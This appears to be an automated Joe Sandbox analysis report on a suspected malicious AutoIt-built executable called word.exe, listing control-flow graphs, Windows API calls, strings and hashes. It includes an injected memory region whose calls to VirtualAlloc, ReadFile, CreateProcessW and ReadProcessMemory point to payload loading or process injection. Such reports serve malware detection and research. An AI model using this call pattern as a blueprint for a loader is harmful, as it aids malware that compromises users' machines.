                                                                    control_flow_graph 440 40f450-40f45c call 425210 443 40f460-40f478 440->443 443->443 444 40f47a-40f4a8 call 413990 call 410f70 443->444 449 40f4b0-40f4d1 call 4151b0 444->449 452 40f531 449->452 453 40f4d3-40f4da 449->453 454 40f536-40f540 452->454 455 40f4dc-40f4de 453->455 456 40f4fd-40f517 call 41557c 453->456 458 40f4e0-40f4e2 455->458 459 40f51c-40f51f 456->459 460 40f4e6-40f4ed 458->460 459->449 461 40f521-40f52c 460->461 462 40f4ef-40f4f2 460->462 465 40f543-40f54e 461->465 466 40f52e-40f52f 461->466 463 42937a-4293a0 call 41557c call 4151b0 462->463 464 40f4f8-40f4fb 462->464 476 4293a5-4293c3 call 4151d0 463->476 464->456 464->458 468 40f550-40f553 465->468 469 40f555-40f560 465->469 466->462 468->462 471 429372 469->471 472 40f566-40f571 469->472 471->463 474 429361-429367 472->474 475 40f577-40f57a 472->475 474->460 477 42936d 474->477 475->462 476->454 477->471
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: __fread_nolock_fseek_strcat
                                                                    • String ID: AU3!$EA06
                                                                    • API String ID: 3818483258-2658333250
                                                                    • Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                    • Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
                                                                    • Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
                                                                    • Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 480 410130-410142 SHGetMalloc 481 410148-410158 SHGetDesktopFolder 480->481 482 42944f-429459 call 411691 480->482 483 4101d1-4101e0 481->483 484 41015a-410188 call 411691 481->484 483->482 490 4101e6-4101ee 483->490 492 4101c5-4101ce 484->492 493 41018a-4101a1 SHGetPathFromIDListW 484->493 492->483 494 4101a3-4101b1 call 411691 493->494 495 4101b4-4101c0 493->495 494->495 495->492
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$DesktopFolderFromListMallocPath
                                                                    • String ID: C:\Users\user\AppData\Roaming\word.exe
                                                                    • API String ID: 192938534-622732448
                                                                    • Opcode ID: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                    • Instruction ID: 2fe23ff91bf644c1e681f842d3c1e96d6f0f177144f23c1ad52f1bdc7517ad48
                                                                    • Opcode Fuzzy Hash: 41672701d810a85b6866b378b1839c38d53fca73f5daf9d2a63f2dfb0070f590
                                                                    • Instruction Fuzzy Hash: 822179B5604211AFC210EB64DC84DABB3ECEFC8704F14891DF94987210E739ED46CBA6

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 498 401230-40123b 499 401241-401272 call 4131f0 call 401be0 498->499 500 4012c5-4012cd 498->500 505 401274-401292 499->505 506 4012ae-4012bf KillTimer SetTimer 499->506 507 42aa61-42aa67 505->507 508 401298-40129c 505->508 506->500 509 42aa8b-42aaa7 Shell_NotifyIconW 507->509 510 42aa69-42aa86 Shell_NotifyIconW 507->510 511 4012a2-4012a8 508->511 512 42aaac-42aab3 508->512 509->506 510->506 511->506 515 42aaf8-42ab15 Shell_NotifyIconW 511->515 513 42aad7-42aaf3 Shell_NotifyIconW 512->513 514 42aab5-42aad2 Shell_NotifyIconW 512->514 513->506 514->506 515->506
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00401257
                                                                      • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                      • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                      • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                      • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                    • KillTimer.USER32 ref: 004012B0
                                                                    • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                    • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                    • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                    • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                    • String ID:
                                                                    • API String ID: 1792922140-0
                                                                    • Opcode ID: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                    • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                    • Opcode Fuzzy Hash: a7115ab057bf29602ed6c82bb799c717f5f73d3545905a596edaeb05fb95c8cc
                                                                    • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 516 35147b0-351485e call 35121e0 519 3514865-351488b call 35156c0 CreateFileW 516->519 522 3514892-35148a2 519->522 523 351488d 519->523 528 35148a4 522->528 529 35148a9-35148c3 VirtualAlloc 522->529 524 35149dd-35149e1 523->524 526 3514a23-3514a26 524->526 527 35149e3-35149e7 524->527 530 3514a29-3514a30 526->530 531 35149f3-35149f7 527->531 532 35149e9-35149ec 527->532 528->524 535 35148c5 529->535 536 35148ca-35148e1 ReadFile 529->536 537 3514a32-3514a3d 530->537 538 3514a85-3514a9a 530->538 533 3514a07-3514a0b 531->533 534 35149f9-3514a03 531->534 532->531 541 3514a1b 533->541 542 3514a0d-3514a17 533->542 534->533 535->524 543 35148e3 536->543 544 35148e8-3514928 VirtualAlloc 536->544 545 3514a41-3514a4d 537->545 546 3514a3f 537->546 539 3514aaa-3514ab2 538->539 540 3514a9c-3514aa7 VirtualFree 538->540 540->539 541->526 542->541 543->524 547 351492a 544->547 548 351492f-351494a call 3515910 544->548 549 3514a61-3514a6d 545->549 550 3514a4f-3514a5f 545->550 546->538 547->524 556 3514955-351495f 548->556 553 3514a7a-3514a80 549->553 554 3514a6f-3514a78 549->554 552 3514a83 550->552 552->530 553->552 554->552 557 3514961-3514990 call 3515910 556->557 558 3514992-35149a6 call 3515720 556->558 557->556 564 35149a8 558->564 565 35149aa-35149ae 558->565 564->524 566 35149b0-35149b4 CloseHandle 565->566 567 35149ba-35149be 565->567 566->567 568 35149c0-35149cb VirtualFree 567->568 569 35149ce-35149d7 567->569 568->569 569->519 569->524
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03514881
                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03514AA7
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466356869.0000000003512000.00000040.00000020.00020000.00000000.sdmp, Offset: 03512000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_3512000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileFreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 204039940-0
                                                                    • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                    • Instruction ID: ee192e38066be2fb8d6a9ebfbe18cd82a1dba8b7bd88544ffe19288a85e4d0d1
                                                                    • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                    • Instruction Fuzzy Hash: ECA15C74E04209EBEB14CFA5D894BEEBBB6FF48304F209599E501BB290C7759A50CF94

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 570 414f10-414f2c 571 414f4f 570->571 572 414f2e-414f31 570->572 574 414f51-414f55 571->574 572->571 573 414f33-414f35 572->573 575 414f37-414f46 call 417f23 573->575 576 414f56-414f5b 573->576 587 414f47-414f4c call 417ebb 575->587 578 414f6a-414f6d 576->578 579 414f5d-414f68 576->579 582 414f7a-414f7c 578->582 583 414f6f-414f77 call 4131f0 578->583 579->578 581 414f8b-414f9e 579->581 585 414fa0-414fa6 581->585 586 414fa8 581->586 582->575 584 414f7e-414f89 582->584 583->582 584->575 584->581 589 414faf-414fb1 585->589 586->589 587->571 592 4150a1-4150a4 589->592 593 414fb7-414fbe 589->593 592->574 595 414fc0-414fc5 593->595 596 415004-415007 593->596 595->596 599 414fc7 595->599 597 415071-415072 call 41e6b1 596->597 598 415009-41500d 596->598 605 415077-41507b 597->605 601 41500f-415018 598->601 602 41502e-415035 598->602 603 415102 599->603 604 414fcd-414fd1 599->604 606 415023-415028 601->606 607 41501a-415021 601->607 609 415037 602->609 610 415039-41503c 602->610 608 415106-41510f 603->608 611 414fd3 604->611 612 414fd5-414fd8 604->612 605->608 613 415081-415085 605->613 614 41502a-41502c 606->614 607->614 608->574 609->610 615 415042-41504e call 41453a call 41ed9e 610->615 616 4150d5-4150d9 610->616 611->612 617 4150a9-4150af 612->617 618 414fde-414fff call 41ee9b 612->618 613->616 619 415087-415096 613->619 614->610 638 415053-415058 615->638 624 4150eb-4150fd call 417f23 616->624 625 4150db-4150e8 call 4131f0 616->625 620 4150b1-4150bd call 4131f0 617->620 621 4150c0-4150d0 call 417f23 617->621 627 415099-41509b 618->627 619->627 620->621 621->587 624->587 625->624 627->592 627->593 639 415114-415118 638->639 640 41505e-415061 638->640 639->608 640->603 641 415067-41506f 640->641 641->627
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                    • String ID:
                                                                    • API String ID: 3886058894-0
                                                                    • Opcode ID: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                    • Instruction ID: 085ef53bf2cba992f8731f00f2d52beda6aca72a1b803249d76dffc069a60243
                                                                    • Opcode Fuzzy Hash: b117a392f3759847975495debe7ea87102f8b7de0bc78f8cbc322732e1c6b221
                                                                    • Instruction Fuzzy Hash: CA510830900604EFCB208FA9C8445DFBBB5EFC5324F24825BF82596290D7799ED2CB99

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042A9B0
                                                                      • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                    • _memset.LIBCMT ref: 00401C62
                                                                    • _wcsncpy.LIBCMT ref: 00401CA1
                                                                    • _wcscpy.LIBCMT ref: 00401CBD
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoadNotifyShell_String_memset_wcscpy_wcslen_wcsncpy
                                                                    • String ID: Line:
                                                                    • API String ID: 1620655955-1585850449
                                                                    • Opcode ID: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                    • Instruction ID: a4e7cf3abc31881c2b93aaae0beefbbd48c64772eea77d32b53e92a0700a02c6
                                                                    • Opcode Fuzzy Hash: b1e388f5f21e32c190c1b7412400e6ffb6374e41c1d48bdcdb7aece10813d053
                                                                    • Instruction Fuzzy Hash: 7431D47151C301ABD324EB11DC41BDB77E8AF94314F04493FF989521A1DB78AA49C79B

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 675 4103e0-410461 CreateWindowExW * 2 ShowWindow * 2
                                                                    APIs
                                                                    • CreateWindowExW.USER32 ref: 00410415
                                                                    • CreateWindowExW.USER32 ref: 0041043E
                                                                    • ShowWindow.USER32(?,00000000), ref: 00410454
                                                                    • ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Window$CreateShow
                                                                    • String ID: AutoIt v3$edit
                                                                    • API String ID: 1584632944-3779509399
                                                                    • Opcode ID: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                    • Instruction ID: daa3d4afae2654ee996124117597f48fa5c574a0ac4b96d00400a8ba476d7f73
                                                                    • Opcode Fuzzy Hash: 2f6e2284bb2ae2ba7cf4e865adc3bced08dc322388bda6343c860b78a8eff359
                                                                    • Instruction Fuzzy Hash: F3F0A975BE4310BAF6609754AC43F592B59A765F00F3445ABB700BF1D0D6E478408B9C

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 676 3514590-35146a8 call 35121e0 call 3514480 CreateFileW 683 35146aa 676->683 684 35146af-35146bf 676->684 685 351475f-3514764 683->685 687 35146c1 684->687 688 35146c6-35146e0 VirtualAlloc 684->688 687->685 689 35146e2 688->689 690 35146e4-35146fb ReadFile 688->690 689->685 691 35146fd 690->691 692 35146ff-3514739 call 35144c0 call 3513480 690->692 691->685 697 3514755-351475d ExitProcess 692->697 698 351473b-3514750 call 3514510 692->698 697->685 698->697
                                                                    APIs
                                                                      • Part of subcall function 03514480: Sleep.KERNELBASE(000001F4), ref: 03514491
                                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0351469E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466356869.0000000003512000.00000040.00000020.00020000.00000000.sdmp, Offset: 03512000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_3512000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CreateFileSleep
                                                                    • String ID: 9F2F6CAJI3DBVPKL06
                                                                    • API String ID: 2694422964-2293838337
                                                                    • Opcode ID: 08da1eee0066d21f635c5570ee643c513a04a4f85d476f12765b5121f83b90d3
                                                                    • Instruction ID: 46d974289d7fa88cdad6ea5ada77037c2df9da1a884072da55230ced5bf39947
                                                                    • Opcode Fuzzy Hash: 08da1eee0066d21f635c5570ee643c513a04a4f85d476f12765b5121f83b90d3
                                                                    • Instruction Fuzzy Hash: F251B171D14249EBEF11DBE4D854BEEBB78AF45300F044599E208BB2C0D7B91B49CBA5

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 700 413a88-413a99 call 41718c 703 413b10-413b15 call 4171d1 700->703 704 413a9b-413aa2 700->704 706 413aa4-413abc call 418407 call 419f6d 704->706 707 413ae7 704->707 718 413ac7-413ad7 call 413ade 706->718 719 413abe-413ac6 call 419f9d 706->719 710 413ae8-413af8 HeapFree 707->710 710->703 712 413afa-413b0f call 417f23 GetLastError call 417ee1 710->712 712->703 718->703 725 413ad9-413adc 718->725 719->718 725->710
                                                                    APIs
                                                                    • __lock.LIBCMT ref: 00413AA6
                                                                      • Part of subcall function 00418407: __mtinitlocknum.LIBCMT ref: 0041841D
                                                                      • Part of subcall function 00418407: __amsg_exit.LIBCMT ref: 00418429
                                                                      • Part of subcall function 00418407: EnterCriticalSection.KERNEL32(?,?,?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001), ref: 00418431
                                                                    • ___sbh_find_block.LIBCMT ref: 00413AB1
                                                                    • ___sbh_free_block.LIBCMT ref: 00413AC0
                                                                    • HeapFree.KERNEL32(00000000,00411739,0048C758), ref: 00413AF0
                                                                    • GetLastError.KERNEL32(?,004224D3,00000004,0048CCA0,0000000C,00417011,00411739,?,00000000,00000000,00000000,?,00416C24,00000001,00000214), ref: 00413B01
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 2714421763-0
                                                                    • Opcode ID: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                    • Instruction ID: 54fb22c17cbd059cfb8714ef359fce415cc636064f476ff80f42ef981757bf49
                                                                    • Opcode Fuzzy Hash: 1be655156b84d1756d47887b3dc267bc1ef03bd4322eaa0c22e254cdcea9361a
                                                                    • Instruction Fuzzy Hash: 7401A731A08301BADF206F71AC09BDF3B64AF00759F10052FF544A6182DB7D9AC19B9C
                                                                    APIs
                                                                      • Part of subcall function 0040F580: _wcslen.LIBCMT ref: 0040F58A
                                                                      • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 0040F5A3
                                                                      • Part of subcall function 0040F580: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,-00000010,00000001,?,?,?,?), ref: 0040F5CC
                                                                    • _strcat.LIBCMT ref: 0040F603
                                                                      • Part of subcall function 0040F6A0: _memset.LIBCMT ref: 0040F6A8
                                                                      • Part of subcall function 0040F6D0: _strlen.LIBCMT ref: 0040F6D8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                    • String ID: HH
                                                                    • API String ID: 1194219731-2761332787
                                                                    • Opcode ID: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
                                                                    • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                    • Opcode Fuzzy Hash: ee47fd20779ff5886c3c730aa44a1efa7791f275b5868e90dcef310a8da63108
                                                                    • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0040E202
                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: IconNotifyShell__memset
                                                                    • String ID:
                                                                    • API String ID: 928536360-0
                                                                    • Opcode ID: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                    • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                    • Opcode Fuzzy Hash: a8f79553875ba5cd412c6e6f6aef719f94b94a7ff7df26053db2d04cf48d3506
                                                                    • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                    APIs
                                                                    • _malloc.LIBCMT ref: 00411734
                                                                      • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                      • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                      • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                      • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                    • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                    • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1411284514-0
                                                                    • Opcode ID: f6d0f9ac01cc1593a24bd4fb6812cf372efb98f80d14d441c12493078b846558
                                                                    • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                    • Opcode Fuzzy Hash: f6d0f9ac01cc1593a24bd4fb6812cf372efb98f80d14d441c12493078b846558
                                                                    • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                    APIs
                                                                    • CreateProcessW.KERNEL32(?,00000000), ref: 03513C3B
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03513CF3
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466356869.0000000003512000.00000040.00000020.00020000.00000000.sdmp, Offset: 03512000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_3512000_word.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CreateMemoryRead
                                                                    • String ID:
                                                                    • API String ID: 2726527582-0
                                                                    • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                    • Instruction ID: a4ed42a87b7c31fcec4566358175e2513a5f9136f5aface6d2b7bd5319e09f28
                                                                    • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                    • Instruction Fuzzy Hash: 74622D34A14218DBEB24CFA4D850BDEB375FF58300F1091A9D10DEB2A0E77A9E95CB59
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.466240102.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000005.00000002.466237083.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466253928.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466256890.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000005.00000002.466262688.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
